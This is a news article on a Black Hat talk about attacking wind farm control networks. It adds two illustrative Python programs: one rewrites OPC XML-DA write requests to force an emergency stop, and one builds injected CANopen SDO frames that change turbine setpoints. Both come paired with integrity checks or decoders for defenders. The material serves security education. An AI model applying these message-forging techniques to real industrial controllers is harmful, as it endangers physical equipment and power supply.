Black Hat: Hacking a Wind Farm

Wednesday, August 2, 2017 @ 02:08 PM gHale


By Gregory Hale
There is no doubt wind power is one of the up-and-coming sources of power that can help fuel a nation in need of more energy, but security is a major issue moving forward.

As more wind farms start to dot the landscape, the thought of how to secure the physical and cyber side of a cluster of turbines, or one single turbine, becomes a very important factor.


“Wind farms are very susceptible to attack,” said Jason Staggs, an information security researcher at the University of Tulsa, during his talk, entitled “Adventures in Attacking Wind Farm Control Networks,” last Wednesday at Black Hat USA 2017 in Las Vegas, NV. “One turbine that is compromised can bring down other turbines.”

Staggs gave an overview of the vulnerabilities facing wind farms:
• Programmable automation controllers (PACs) running legacy operating systems, with everything running as root, insecure remote management services, easy-to-guess default passwords, and no code signing
• No authentication or encryption of control messages
• No network segmentation between wind turbines
• No physical security

By simply picking the lock on a turbine, an attacker could plug a Raspberry Pi into the turbine’s PAC network and circumvent what little network security exists.

IEC 61400-25 defines the communications requirements for wind power plants, and most wind farms use OPC XML-DA message services for supervisory traffic.

That message service is where some of the issues come in: because the control messages carry no authentication or encryption, an attacker who reaches the network can read and forge them.

The specific commands an attacker could abuse at a single turbine vary from vendor to vendor, but in most cases an attacker could change the maximum power generation output; change the turbine’s operating state (on, off, or idle); or trigger an emergency shutdown, which can be a hard stop that induces excessive wear and tear on critical mechanical components.

Once on the network, an attacker could mount a man-in-the-middle attack by intercepting an OPC XML-DA request from the HMI to the turbines and replacing it with a malicious request that causes damage, Staggs said.

That can be done simply by breaking into a turbine in some remote location, connecting through a port on a system at the turbine, giving the attacker’s device a static ID on the turbine network, and then operating freely from there.
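The man-in-the-middle scenario above, as an added illustration that is not code from the talk or from any vendor: a constructed OPC XML-DA Write request of the kind an HMI might send, a function that shows how trivially an on-path attacker can rewrite it when nothing authenticates the message, and a keyed-MAC check standing in for the per-message integrity an encrypted tunnel between HMI and tower would provide. The item names (Turbine01/...), the shared key and the exact SOAP body are assumptions for the demonstration; only the general Write/ItemList/Items/Value shape follows the OPC XML-DA 1.0 specification.

```python
"""Added example: tampering with an unauthenticated OPC XML-DA Write request
in transit, and an integrity check that would catch it.

Illustrative code written for this article, not code from the talk or from
any turbine vendor. Item names, values and the HMAC key are invented.
"""
import hashlib
import hmac
import xml.etree.ElementTree as ET

OPC_NS = "http://opcfoundation.org/webservices/XMLDA/1.0/"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
NS = {"s": SOAP_NS, "opc": OPC_NS}

POWER_ITEM = "Turbine01/Control/MaxPowerSetpoint_kW"   # assumed tag name
STATE_ITEM = "Turbine01/Control/OperatingState"        # assumed tag name

# Constructed sample: an HMI raising a power cap and keeping the turbine running.
HMI_WRITE_REQUEST = f"""<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="{SOAP_NS}">
  <s:Body>
    <Write xmlns="{OPC_NS}" ReturnValuesOnReply="true">
      <Options ClientRequestHandle="hmi-0042"/>
      <ItemList>
        <Items ItemName="{POWER_ITEM}">
          <Value xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                 xsi:type="xsd:int">2000</Value>
        </Items>
        <Items ItemName="{STATE_ITEM}">
          <Value xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                 xsi:type="xsd:string">Run</Value>
        </Items>
      </ItemList>
    </Write>
  </s:Body>
</s:Envelope>
"""


def write_items(soap_xml: str) -> dict:
    """Return {item_name: value_text} for every item in a Write request."""
    root = ET.fromstring(soap_xml)
    items = {}
    for item in root.findall(".//opc:Write/opc:ItemList/opc:Items", NS):
        value = item.find("opc:Value", NS)
        items[item.get("ItemName")] = value.text if value is not None else None
    return items


def tamper(soap_xml: str, target_item: str, new_value: str) -> str:
    """What an on-path attacker can do when nothing authenticates the message:
    rewrite one item's value and forward the request otherwise unchanged.
    The turbine cannot tell this from a legitimate HMI write."""
    root = ET.fromstring(soap_xml)
    for item in root.findall(".//opc:Write/opc:ItemList/opc:Items", NS):
        if item.get("ItemName") == target_item:
            item.find("opc:Value", NS).text = new_value
    return ET.tostring(root, encoding="unicode")


def seal(soap_xml: str, key: bytes) -> str:
    """Integrity tag over the exact bytes sent. A VPN/TLS tunnel gives the
    same property at the transport layer; this just makes it visible."""
    return hmac.new(key, soap_xml.encode("utf-8"), hashlib.sha256).hexdigest()


def verify(soap_xml: str, tag: str, key: bytes) -> bool:
    """Reject any message whose bytes were altered after sealing."""
    expected = seal(soap_xml, key)
    return hmac.compare_digest(expected, tag)


if __name__ == "__main__":
    key = b"assumed-shared-key"  # invented for the demo
    tag = seal(HMI_WRITE_REQUEST, key)
    forged = tamper(HMI_WRITE_REQUEST, STATE_ITEM, "EmergencyStop")
    print("original:", write_items(HMI_WRITE_REQUEST))
    print("forged:  ", write_items(forged))
    print("original verifies:", verify(HMI_WRITE_REQUEST, tag, key))
    print("forged verifies:  ", verify(forged, tag, key))
```

Without the seal (or a tunnel providing the same guarantee) the forged request is indistinguishable from the HMI’s own, which is the core of the attack described above; with it, the turbine side can drop the altered message before acting on it.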

It would also be possible to target the PAC directly and take over root accounts protected only by default or weak passwords.

Malware could then propagate across the farm by uploading it to each controller over FTP and executing it via telnet, both of which the PACs expose.

Modifying Controls
After that, it would be possible to modify critical turbine process control variables through the CANopen object dictionary. The layout of a controller’s object dictionary is defined in the vendor’s electronic data sheet (EDS), so an attacker who has it can inject CANopen service data object (SDO) messages and manipulate power generation and motor variables, Staggs said.
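The CANopen step above, as an added worked example that is not the talk’s tooling or any vendor’s code: it reads a constructed EDS excerpt (the INI-style layout CiA 306 defines), builds the expedited SDO download frames an attacker on the bus would inject to rewrite a variable (CiA 301 framing, which is public), and models the controller’s reply. The object indices, parameter names and node ID are invented for the demonstration; real controllers put these in the vendor-specific 0x2000 to 0x5FFF area with their own names. The point the code makes is that the controller’s only check is the EDS access type; nothing asks who is writing.

```python
"""Added example: CANopen SDO writes derived from an EDS object dictionary.

Illustrative code for this article; not from the talk or any vendor.
Indices 0x2001-0x2003, the names and node ID 5 are invented.
"""
import configparser
import struct

# Constructed EDS excerpt (same section layout a real EDS file uses).
EDS_TEXT = """
[2001]
ParameterName=MaxGeneratorPower_kW
DataType=0x0006
AccessType=rw

[2002]
ParameterName=PitchAngleSetpoint_deg
DataType=0x0004
AccessType=rw

[2003]
ParameterName=RotorSpeed_rpm
DataType=0x0006
AccessType=ro
"""

# CiA 301 data type codes -> (struct format, byte length), expedited SDO only.
DATA_TYPES = {0x0002: ("<b", 1), 0x0003: ("<h", 2), 0x0004: ("<i", 4),
              0x0005: ("<B", 1), 0x0006: ("<H", 2), 0x0007: ("<I", 4)}

SDO_RX_BASE = 0x600      # client -> server: commands into the controller
SDO_TX_BASE = 0x580      # server -> client: responses
ABORT_READ_ONLY = 0x06010002   # CiA 301: attempt to write a read-only object
ABORT_NO_OBJECT = 0x06020000   # CiA 301: object does not exist


def parse_eds(text):
    """Map ParameterName -> {index, subindex, datatype, access} from an EDS."""
    cp = configparser.ConfigParser()
    cp.read_string(text)
    od = {}
    for section in cp.sections():
        if section.isalnum() and len(section) <= 4:       # plain [XXXX] entries
            sec = cp[section]
            od[sec["ParameterName"]] = {"index": int(section, 16), "subindex": 0,
                                        "datatype": int(sec["DataType"], 16),
                                        "access": sec["AccessType"].lower()}
    return od


def sdo_download_frame(node_id, entry, value):
    """Expedited SDO download: (CAN ID, 8-byte payload) that writes `value`."""
    fmt, n = DATA_TYPES[entry["datatype"]]
    cs = 0x23 | ((4 - n) << 2)          # ccs=1, e=1, s=1, n = unused bytes
    payload = (bytes([cs]) + struct.pack("<HB", entry["index"], entry["subindex"])
               + struct.pack(fmt, value).ljust(4, b"\x00"))
    return SDO_RX_BASE + node_id, payload


def decode_sdo_download(can_id, payload, od):
    """What a bus monitor would log for an injected write, resolved via the EDS."""
    cs = payload[0]
    if cs & 0xE3 != 0x23:
        raise ValueError("not an expedited, size-indicated SDO download")
    n = 4 - ((cs >> 2) & 0x3)
    index, subindex = struct.unpack("<HB", payload[1:4])
    name = next((k for k, e in od.items()
                 if e["index"] == index and e["subindex"] == subindex), None)
    data = payload[4:4 + n]
    value = (struct.unpack(DATA_TYPES[od[name]["datatype"]][0], data)[0]
             if name else int.from_bytes(data, "little"))
    return {"node": can_id - SDO_RX_BASE, "index": index, "subindex": subindex,
            "name": name, "value": value}


def controller_response(can_id, payload, od):
    """Model the controller: it enforces EDS access type and nothing else."""
    req = decode_sdo_download(can_id, payload, od)
    hdr = struct.pack("<HB", req["index"], req["subindex"])
    resp_id = SDO_TX_BASE + req["node"]
    if req["name"] is None:
        return resp_id, bytes([0x80]) + hdr + struct.pack("<I", ABORT_NO_OBJECT)
    if "w" not in od[req["name"]]["access"]:
        return resp_id, bytes([0x80]) + hdr + struct.pack("<I", ABORT_READ_ONLY)
    od[req["name"]]["value"] = req["value"]   # accepted: no source check at all
    return resp_id, bytes([0x60]) + hdr + b"\x00\x00\x00\x00"


if __name__ == "__main__":
    od = parse_eds(EDS_TEXT)
    cid, frame = sdo_download_frame(5, od["MaxGeneratorPower_kW"], 0)
    print(hex(cid), frame.hex(), decode_sdo_download(cid, frame, od))
    print(controller_response(cid, frame, od))
```

The same decoder, run over captured bus traffic against the vendor EDS, is what a defender would use to turn raw CAN frames into “who wrote which setpoint,” since the controller itself keeps no such record.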

Staggs went on to add it is possible to hold a wind farm hostage using ransomware.

At today’s rates, a wind farm can lose $10,000 to $30,000 for every hour it’s not in operation, he said.

Again, the attacker would gain access to a wind turbine and load malware onto the turbine system.

The malware would first put the turbine into a paralyzed state, then disable the remote network management servers so operators cannot intervene, and only then start the ransomware campaign.

Because, as Staggs pointed out, getting into a wind farm network is relatively easy, operators need to know what they must do to recover from an attack.

Two options are to reimage the automation controllers, which takes time, or to replace the hardware, which also takes time and adds cost. Either way, the operator loses the ability to produce electricity for the duration.

As Staggs put it, wind farm security is poor at best, so operators need to get more active and not wait for vendors to provide security. They also need to verify vendor claims about security, and to retrofit security onto the farms they already run.

In addition, they should move toward network segmentation, with inline firewalls at each tower, and employ encrypted VPN tunnels to each tower so that control traffic can no longer be read or forged in transit.


